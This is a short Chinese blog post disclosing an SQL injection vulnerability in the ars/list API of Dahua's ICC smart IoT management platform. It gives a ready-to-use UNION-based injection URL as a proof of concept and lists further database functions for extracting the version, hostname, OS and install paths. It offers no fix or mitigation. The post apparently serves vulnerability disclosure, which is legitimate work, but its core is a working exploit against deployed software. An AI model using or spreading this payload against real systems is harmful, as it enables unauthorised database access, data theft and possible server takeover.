大华智能物联管理平台evo-apigw/evo-arsm/1.0.0/ars/list接口存在SQL注入漏洞

智能物联综合管理平台(平台版本:V5.000.0000016.0.R)

 一、漏洞描述

大华ICC智能物联综合管理平台大华ICC智能物联综合管理平台 ars/list 接口存在SQL注入漏洞。恶意攻击者通过注入恶意SQL指令,可非法访问、篡改或删除数据库敏感数据,甚至通过数据库提权功能获取服务器最高控制权,导致严重的数据泄露或业务中断。

image

二、验证POC

 /evo-apigw/evo-arsm/1.0.0/ars/list?serviceName=%27+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(0x7e,user(),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-

  • 其他可用函数:
  • VERSION() 数据库版本
  • USER() 当前用户(含主机)
  • CURRENT_USER() 当前用户
  • DATABASE() 当前数据库名
  • @@hostname 服务器主机名
  • @@version_compile_os 操作系统
  • @@datadir 数据目录
  • @@basedir 安装目录
  • @@version_compile_machine 系统架构

三、验证截图

image

 

posted @ 2026-08-14 15:22  杭椒の暗杀行动  阅读(1)  评论(0)    收藏  举报